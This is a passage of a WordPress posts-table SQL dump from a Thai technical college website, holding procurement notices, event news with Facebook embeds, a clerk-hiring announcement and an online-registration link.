(4059, 3, '2018-10-03 09:40:47', '2018-10-03 02:40:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%B4%E0%B8%94-CMT.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด CMT ประจำปีงบประมาณ พ.ศ. 2562', '', 'inherit', 'closed', 'closed', '', '4057-revision-v1', '', '', '2018-10-03 09:40:47', '2018-10-03 02:40:47', '', 4057, 'http://www.technicrayong.ac.th/4057-revision-v1/', 0, 'revision', '', 0),
(4060, 3, '2018-10-03 09:58:32', '2018-10-03 02:58:32', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C%E0%B8%AD%E0%B8%B1%E0%B8%88%E0%B8%89%E0%B8%A3%E0%B8%B4%E0%B8%A2%E0%B8%B0.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ ประจำปีงบประมาณ พ.ศ. 2562', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-6', '', '', '2018-10-03 09:58:32', '2018-10-03 02:58:32', '', 0, 'http://www.technicrayong.ac.th/?p=4060', 281, 'post', '', 0),
(4061, 3, '2018-10-03 09:58:18', '2018-10-03 02:58:18', '', 'ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c%e0%b8%ad%e0%b8%b1', '', '', '2018-10-03 09:58:18', '2018-10-03 02:58:18', '', 4060, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ.pdf', 0, 'attachment', 'application/pdf', 0),
(4062, 3, '2018-10-03 09:58:32', '2018-10-03 02:58:32', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C%E0%B8%AD%E0%B8%B1%E0%B8%88%E0%B8%89%E0%B8%A3%E0%B8%B4%E0%B8%A2%E0%B8%B0.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ ประจำปีงบประมาณ พ.ศ. 2562', '', 'inherit', 'closed', 'closed', '', '4060-revision-v1', '', '', '2018-10-03 09:58:32', '2018-10-03 02:58:32', '', 4060, 'http://www.technicrayong.ac.th/4060-revision-v1/', 0, 'revision', '', 0),
(4063, 3, '2018-10-03 10:02:53', '2018-10-03 03:02:53', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ชุดฝึกหุ่นยนต์อุตสาหกรรม ประจำปีงบประมาณ พ.ศ. 2562', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-7', '', '', '2018-10-03 10:02:53', '2018-10-03 03:02:53', '', 0, 'http://www.technicrayong.ac.th/?p=4063', 280, 'post', '', 0),
(4064, 3, '2018-10-03 10:02:42', '2018-10-03 03:02:42', '', 'ชุดฝึกหุ่นยนต์อุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ab%e0%b8%b8%e0%b9%88%e0%b8%99%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3', '', '', '2018-10-03 10:02:42', '2018-10-03 03:02:42', '', 4063, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ชุดฝึกหุ่นยนต์อุตสาหกรรม.pdf', 0, 'attachment', 'application/pdf', 0),
(4065, 3, '2018-10-03 10:02:53', '2018-10-03 03:02:53', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ชุดฝึกหุ่นยนต์อุตสาหกรรม ประจำปีงบประมาณ พ.ศ. 2562', '', 'inherit', 'closed', 'closed', '', '4063-revision-v1', '', '', '2018-10-03 10:02:53', '2018-10-03 03:02:53', '', 4063, 'http://www.technicrayong.ac.th/4063-revision-v1/', 0, 'revision', '', 0),
(4066, 3, '2018-10-03 10:04:08', '2018-10-03 03:04:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.685527305156794%26type%3D3&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 1 ตุลาคม 2561 วิทยาลัยเทคนิคระยอง ร่วมกับกระทรวงการท่องเที่ยวและกีฬา บริษัท พีทีที โกลบอล เคมิคอล จำกัด (มหาชน) โครงการเชฟชุมชนเพื่อท่องเที่ยวไทยยั่งยืน เพื่อส่งเสริมภาพลักษณ์การท่องเที่ยวเชิงวัฒนธรรมอาหารให้กับประเทศไทย โดยยกระดับมาตราฐานอาหารไทยจากระดับชุมชน สร้างเครือข่ายด้านการท่องเที่ยวเชิงอาหารแปรรูปธรรมและกระตุ้นเศรษฐกิจในระดับชุมชนอย่างยั่งยืน ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4033-autosave-v1', '', '', '2018-10-03 10:04:08', '2018-10-03 03:04:08', '', 4033, 'http://www.technicrayong.ac.th/4033-autosave-v1/', 0, 'revision', '', 0),
(4067, 3, '2018-10-03 10:04:26', '2018-10-03 03:04:26', '', '42855045_685621068480751_6519273520784998400_o', '', 'inherit', 'closed', 'closed', '', '42855045_685621068480751_6519273520784998400_o', '', '', '2018-10-03 10:04:26', '2018-10-03 03:04:26', '', 4033, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42855045_685621068480751_6519273520784998400_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4068, 3, '2018-10-03 10:04:52', '2018-10-03 03:04:52', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.685527305156794%26type%3D3&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 1 ตุลาคม 2561 วิทยาลัยเทคนิคระยอง ร่วมกับกระทรวงการท่องเที่ยวและกีฬา บริษัท พีทีที โกลบอล เคมิคอล จำกัด (มหาชน) โครงการเชฟชุมชนเพื่อท่องเที่ยวไทยยั่งยืน เพื่อส่งเสริมภาพลักษณ์การท่องเที่ยวเชิงวัฒนธรรมอาหารให้กับประเทศไทย โดยยกระดับมาตราฐานอาหารไทยจากระดับชุมชน สร้างเครือข่ายด้านการท่องเที่ยวเชิงอาหารแปรรูปธรรมและกระตุ้นเศรษฐกิจในระดับชุมชนอย่างยั่งยืน ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4033-revision-v1', '', '', '2018-10-03 10:04:52', '2018-10-03 03:04:52', '', 4033, 'http://www.technicrayong.ac.th/4033-revision-v1/', 0, 'revision', '', 0),
(4070, 3, '2018-10-04 10:37:34', '2018-10-04 03:37:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D685738901802301%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 1 ตุลาคม 2561 นักเรียน นักศึกษาของวิทยาลัยฯ ช่วยขนย้ายเตียงผู้ป่วยจาก ชั้น 1-2-3 อาคารร่มสุข ไปตึกใหม่ชั้น 4-5-6-7 ของโรงพยาบาลระยอง โดยทีมงานปกครองเป็นผู้ควบคุมดูแล ระหว่างการขนย้ายนักเรียน นักศึกษาได้เก็บเงินได้และนำส่งเจ้าหน้าที่โรงพยาบาล เป็นตัวอย่างที่ได้รับการชื่นชมนักเรียน นักศึกษาของเราที่มีจิตอาสาและมีความซื่อสัตย์', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-1-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%99%e0%b8%b1%e0%b8%81', '', '', '2018-10-04 10:37:34', '2018-10-04 03:37:34', '', 0, 'http://www.technicrayong.ac.th/?p=4070', 279, 'post', '', 0),
(4071, 3, '2018-10-04 10:37:07', '2018-10-04 03:37:07', '', '42933039_685738788468979_201661504959807488_o', '', 'inherit', 'closed', 'closed', '', '42933039_685738788468979_201661504959807488_o', '', '', '2018-10-04 10:37:07', '2018-10-04 03:37:07', '', 4070, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42933039_685738788468979_201661504959807488_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4072, 3, '2018-10-04 10:37:34', '2018-10-04 03:37:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D685738901802301%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 1 ตุลาคม 2561 นักเรียน นักศึกษาของวิทยาลัยฯ ช่วยขนย้ายเตียงผู้ป่วยจาก ชั้น 1-2-3 อาคารร่มสุข ไปตึกใหม่ชั้น 4-5-6-7 ของโรงพยาบาลระยอง โดยทีมงานปกครองเป็นผู้ควบคุมดูแล ระหว่างการขนย้ายนักเรียน นักศึกษาได้เก็บเงินได้และนำส่งเจ้าหน้าที่โรงพยาบาล เป็นตัวอย่างที่ได้รับการชื่นชมนักเรียน นักศึกษาของเราที่มีจิตอาสาและมีความซื่อสัตย์', '', 'inherit', 'closed', 'closed', '', '4070-revision-v1', '', '', '2018-10-04 10:37:34', '2018-10-04 03:37:34', '', 4070, 'http://www.technicrayong.ac.th/4070-revision-v1/', 0, 'revision', '', 0),
(4073, 3, '2018-10-04 10:40:14', '2018-10-04 03:40:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1986425644710963&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 2 ตุลาคม 2561 งานแนะแนวอาชีพและการจัดหางาน วิทยาลัยเทคนิคระยอง นำนักศึกษาระดับ ปวส.1 และ ปวส.2 เข้าร่วมพิธีมอบทุนการศึกษาคาวาซากิ ประจำปี 2561 จำนวน 3 ทุน ทุนละ 15,000 บาท รวมเป็นเงินทั้งสิ้น 45,000 บาท ณ ห้องประชุม บริษัท คาวาซากิ มอเตอร์ เอ็นเตอร์ไพรส์(ประเทศไทย) จำกัด อำเภอปลวกแดง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-2%e2%80%8b-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1%e2%80%8b-2561', '', '', '2018-10-04 10:40:14', '2018-10-04 03:40:14', '', 0, 'http://www.technicrayong.ac.th/?p=4073', 278, 'post', '', 0),
(4074, 3, '2018-10-04 10:39:58', '2018-10-04 03:39:58', '', '43091933_1986424988044362_8232802190117306368_n', '', 'inherit', 'closed', 'closed', '', '43091933_1986424988044362_8232802190117306368_n', '', '', '2018-10-04 10:39:58', '2018-10-04 03:39:58', '', 4073, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/43091933_1986424988044362_8232802190117306368_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4075, 3, '2018-10-04 10:40:14', '2018-10-04 03:40:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1986425644710963&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 2 ตุลาคม 2561 งานแนะแนวอาชีพและการจัดหางาน วิทยาลัยเทคนิคระยอง นำนักศึกษาระดับ ปวส.1 และ ปวส.2 เข้าร่วมพิธีมอบทุนการศึกษาคาวาซากิ ประจำปี 2561 จำนวน 3 ทุน ทุนละ 15,000 บาท รวมเป็นเงินทั้งสิ้น 45,000 บาท ณ ห้องประชุม บริษัท คาวาซากิ มอเตอร์ เอ็นเตอร์ไพรส์(ประเทศไทย) จำกัด อำเภอปลวกแดง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4073-revision-v1', '', '', '2018-10-04 10:40:14', '2018-10-04 03:40:14', '', 4073, 'http://www.technicrayong.ac.th/4073-revision-v1/', 0, 'revision', '', 0),
(4076, 3, '2018-10-04 13:09:08', '2018-10-04 06:09:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D686487015060823%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 2 ตุลาคม 2561 คุณชาตรี ปุระมงคล ศึกษาธิการจังหวัดระยอง ร่วมแสดงความยินดีกับ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมพูดคุยแลกเปลี่ยนทัศนคติ ขอคำปรึกษาด้านการเรียนการสอน ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-2-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%84%e0%b8%b8%e0%b8%93', '', '', '2018-10-04 13:09:08', '2018-10-04 06:09:08', '', 0, 'http://www.technicrayong.ac.th/?p=4076', 277, 'post', '', 0),
(4077, 3, '2018-10-04 13:08:50', '2018-10-04 06:08:50', '', '42959026_686486801727511_6724840418032222208_o', '', 'inherit', 'closed', 'closed', '', '42959026_686486801727511_6724840418032222208_o', '', '', '2018-10-04 13:08:50', '2018-10-04 06:08:50', '', 4076, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42959026_686486801727511_6724840418032222208_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4078, 3, '2018-10-04 13:09:08', '2018-10-04 06:09:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D686487015060823%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 2 ตุลาคม 2561 คุณชาตรี ปุระมงคล ศึกษาธิการจังหวัดระยอง ร่วมแสดงความยินดีกับ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมพูดคุยแลกเปลี่ยนทัศนคติ ขอคำปรึกษาด้านการเรียนการสอน ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4076-revision-v1', '', '', '2018-10-04 13:09:08', '2018-10-04 06:09:08', '', 4076, 'http://www.technicrayong.ac.th/4076-revision-v1/', 0, 'revision', '', 0),
(4079, 3, '2018-10-05 10:25:36', '2018-10-05 03:25:36', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน 12 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5', '', '', '2018-10-05 10:25:36', '2018-10-05 03:25:36', '', 0, 'http://www.technicrayong.ac.th/?p=4079', 276, 'post', '', 0),
(4080, 3, '2018-10-05 10:25:16', '2018-10-05 03:25:16', '', 'ประกาศรับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ ธุรการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5', '', '', '2018-10-05 10:25:16', '2018-10-05 03:25:16', '', 4079, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ประกาศรับสมัครสอบคัดเลือกลูกจ้างชั่วคราว-ทำหน้าที่-เจ้าหน้าที่-ธุรการ.pdf', 0, 'attachment', 'application/pdf', 0),
(4081, 3, '2018-10-05 10:25:36', '2018-10-05 03:25:36', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน 12 อัตรา', '', 'inherit', 'closed', 'closed', '', '4079-revision-v1', '', '', '2018-10-05 10:25:36', '2018-10-05 03:25:36', '', 4079, 'http://www.technicrayong.ac.th/4079-revision-v1/', 0, 'revision', '', 0),
(4086, 1, '2018-10-07 22:56:06', '2018-10-07 15:56:06', '', 'e-Student Banner', '', 'inherit', 'closed', 'closed', '', 'e-student-banner', '', '', '2018-10-07 22:56:06', '2018-10-07 15:56:06', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/e-Student-Banner.jpg', 0, 'attachment', 'image/jpeg', 0),
(4093, 1, '2018-10-07 23:29:06', '2018-10-07 16:29:06', '<h3 style=\"text-align: center;\"><a href=\"http://203.151.93.149/rayong/index.php\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone size-full wp-image-4086\" src=\"/wp-content/uploads/2018/10/e-Student-Banner.jpg\" alt=\"\" width=\"220\" height=\"97\" />\r\nลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561\r\nคลิ๊กที่นี่</h3></a>', 'ลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%ad%e0%b8%99%e0%b9%84%e0%b8%a5%e0%b8%99%e0%b9%8c2-2561', '', '', '2018-10-07 23:33:11', '2018-10-07 16:33:11', '', 0, 'http://www.technicrayong.ac.th/?p=4093', 275, 'post', '', 0),
(4094, 1, '2018-10-07 23:29:06', '2018-10-07 16:29:06', '<h3 style=\"text-align: center;\"><a href=\"http://203.151.93.149/rayong/index.php\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone size-full wp-image-4086\" src=\"/wp-content/uploads/2018/10/e-Student-Banner.jpg\" alt=\"\" width=\"220\" height=\"97\" /></a>\r\nลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561\r\nคลิ๊กที่นี่</h3>', '', '', 'inherit', 'closed', 'closed', '', '4093-revision-v1', '', '', '2018-10-07 23:29:06', '2018-10-07 16:29:06', '', 4093, 'http://www.technicrayong.ac.th/4093-revision-v1/', 0, 'revision', '', 0),
(4095, 1, '2018-10-07 23:30:46', '2018-10-07 16:30:46', '<h3 style=\"text-align: center;\"><a href=\"http://203.151.93.149/rayong/index.php\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone size-full wp-image-4086\" src=\"/wp-content/uploads/2018/10/e-Student-Banner.jpg\" alt=\"\" width=\"220\" height=\"97\" /></a>\r\nลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561\r\nคลิ๊กที่นี่</h3>', 'ลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561', '', 'inherit', 'closed', 'closed', '', '4093-revision-v1', '', '', '2018-10-07 23:30:46', '2018-10-07 16:30:46', '', 4093, 'http://www.technicrayong.ac.th/4093-revision-v1/', 0, 'revision', '', 0),
(4096, 1, '2018-10-07 23:33:11', '2018-10-07 16:33:11', '<h3 style=\"text-align: center;\"><a href=\"http://203.151.93.149/rayong/index.php\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone size-full wp-image-4086\" src=\"/wp-content/uploads/2018/10/e-Student-Banner.jpg\" alt=\"\" width=\"220\" height=\"97\" />\r\nลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561\r\nคลิ๊กที่นี่</h3></a>', 'ลงทะเบียนออนไลน์ภาคเรียนที่ 2/2561', '', 'inherit', 'closed', 'closed', '', '4093-revision-v1', '', '', '2018-10-07 23:33:11', '2018-10-07 16:33:11', '', 4093, 'http://www.technicrayong.ac.th/4093-revision-v1/', 0, 'revision', '', 0),
(4098, 3, '2018-10-10 10:01:06', '2018-10-10 03:01:06', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.689191268123731%26type%3D3&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 8 ตุลาคม 2561 คณะผู้บริหารวิทยาลัยสังกัดคณะกรรมการการอาชีวศึกษา หน่วยงานภาครัฐ และเอกชน รวมไปถึงสถานประกอบการ เข้าร่วมประชุมโครงการขึ้นทะเบียนครูพิเศษอาชีวศึกษาอุตสาหกรรม 4.0 และ 10 อุตสาหกรรมในพื้นที่ EEC และเตรียมพร้อมต้อนรับ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ (พลเอก สุรเชษฐ์ ชัยวงศ์) โดยมีท่าน ดร.ธวัชชัย อุ่ยพานิช รองศึกษาธิการภาค 9 และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ประธานคณะกรรมการอาชีวศึกษาจังหวัดระยอง เป็นประธานในพิธี ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', 